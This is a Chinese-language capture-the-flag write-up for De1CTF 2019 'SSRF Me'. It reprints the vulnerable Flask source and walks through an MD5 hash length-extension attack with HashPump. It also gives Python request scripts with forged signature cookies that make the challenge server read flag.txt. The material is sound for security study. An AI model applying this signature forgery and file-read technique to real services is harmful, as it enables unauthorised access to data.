[De1CTF 2019]SSRF Me
知识点
- hash长度扩展攻击
- SSRF
参考自赵师傅博客De1CTF Web WriteUp
题目给了源码
#! /usr/bin/env python ##encoding=utf-8 from flask import Flask from flask import request import socket import hashlib import urllib import sys import os import json reload(sys) sys.setdefaultencoding('latin1') app = Flask(__name__) secert_key = os.urandom(16) class Task: def __init__(self, action, param, sign, ip): self.action = action self.param = param self.sign = sign self.sandbox = md5(ip) if(not os.path.exists(self.sandbox)): #SandBox For Remote_Addr os.mkdir(self.sandbox) def Exec(self): result = {} result['code'] = 500 if (self.checkSign()): if "scan" in self.action: tmpfile = open("./%s/result.txt" % self.sandbox, 'w') resp = scan(self.param) if (resp == "Connection Timeout"): result['data'] = resp else: print resp tmpfile.write(resp) tmpfile.close() result['code'] = 200 if "read" in self.action: f = open("./%s/result.txt" % self.sandbox, 'r') result['code'] = 200 result['data'] = f.read() if result['code'] == 500: result['data'] = "Action Error" else: result['code'] = 500 result['msg'] = "Sign Error" return result def checkSign(self): if (getSign(self.action, self.param) == self.sign): return True else: return False #generate Sign For Action Scan. @app.route("/geneSign", methods=['GET', 'POST']) def geneSign(): param = urllib.unquote(request.args.get("param", "")) action = "scan" return getSign(action, param) @app.route('/De1ta',methods=['GET','POST']) def challenge(): action = urllib.unquote(request.cookies.get("action")) param = urllib.unquote(request.args.get("param", "")) sign = urllib.unquote(request.cookies.get("sign")) ip = request.remote_addr if(waf(param)): return "No Hacker!!!!" task = Task(action, param, sign, ip) return json.dumps(task.Exec()) @app.route('/') def index(): return open("code.txt","r").read() def scan(param): socket.setdefaulttimeout(1) try: return urllib.urlopen(param).read()[:50] except: return "Connection Timeout" def getSign(action, param): return hashlib.md5(secert_key + param + action).hexdigest() def md5(content): return hashlib.md5(content).hexdigest() def waf(param): check=param.strip().lower() if check.startswith("gopher") or check.startswith("file"): return True else: return False if __name__ == '__main__': app.debug = False app.run(host='0.0.0.0',port=80)
获取源码@app.route('/') def index(): return open("code.txt","r").read()
返回md5(secret_key + param + action)@app.route("/geneSign", methods=['GET', 'POST']) def geneSign(): param = urllib.unquote(request.args.get("param", "")) action = "scan" return getSign(action, param) def getSign(action, param): return hashlib.md5(secert_key + param + action).hexdigest()
从cookie中解析出action和sign,从参数中解析出para,经过waf检验后放入Task类@app.route('/De1ta',methods=['GET','POST']) def challenge(): action = urllib.unquote(request.cookies.get("action")) param = urllib.unquote(request.args.get("param", "")) sign = urllib.unquote(request.cookies.get("sign")) ip = request.remote_addr if(waf(param)): return "No Hacker!!!!" task = Task(action, param, sign, ip) return json.dumps(task.Exec())
ban掉了ssrf常用的gopher和filedef waf(param): check=param.strip().lower() if check.startswith("gopher") or check.startswith("file"): return True else: return False
解题思路:
- 可以不加file,绕过waf,但是服务器解析时会自动添加file
- 使用local_file
def Exec(self): result = {} result['code'] = 500 if (self.checkSign()): if "scan" in self.action: tmpfile = open("./%s/result.txt" % self.sandbox, 'w') resp = scan(self.param) if (resp == "Connection Timeout"): result['data'] = resp else: print resp tmpfile.write(resp) tmpfile.close() result['code'] = 200 if "read" in self.action: f = open("./%s/result.txt" % self.sandbox, 'r') result['code'] = 200 result['data'] = f.read() if result['code'] == 500: result['data'] = "Action Error" else: result['code'] = 500 result['msg'] = "Sign Error" return result def scan(param): socket.setdefaulttimeout(1) try: return urllib.urlopen(param).read()[:50] except: return "Connection Timeout"
- 先看’scan’字符串在不在传入的action里面
- 调用scan函数,使用urlopen远程打开文件,即param参数
- 将文件写入result.txt
- 如果action里有’read’,则将result.txt的内容放到result[‘data’]中
前提:action里要有read和scan,且能通过md5签名认证
获取flag:将flag.txt读到result.txt中,再进行读取
先获取一个md5(secret_key + flag.txt + scan)
#coding:utf-8 # -*- coding: cp936 -*- import requests url = 'http://93155973-22fe-40f5-ae5d-445a4eb9f993.node3.buuoj.cn/geneSign?param=flag.txt' cookies = { 'action':'scan', 'sign':'sign' } r = requests.get(url = url, cookies = cookies) print(r.text) #9f403b0981921ba4078528645384004f
secret_key长度为16,源码开头有设置,加上flag.txt的长度8,即为24
使用HashPump进行hash长度拓展
root@kali:/HashPump# ./hashpump Input Signature: 9f403b0981921ba4078528645384004f Input Data: scan Input Key Length: 24 Input Data to Add: read 93f731d6ed45b861de8d3253ddaf4861 scan\x80\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe0\x00\x00\x00\x00\x00\x00\x00read
#coding:utf-8 # -*- coding: cp936 -*- import requests url = 'http://93155973-22fe-40f5-ae5d-445a4eb9f993.node3.buuoj.cn/De1ta?param=flag.txt' cookies = { 'sign': '93f731d6ed45b861de8d3253ddaf4861', 'action': 'scan%80%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%e0%00%00%00%00%00%00%00read', } res = requests.get(url=url, cookies=cookies) print(res.text)
还是没有明白hash长度拓展攻击的原理
参考浅谈MD5扩展长度攻击
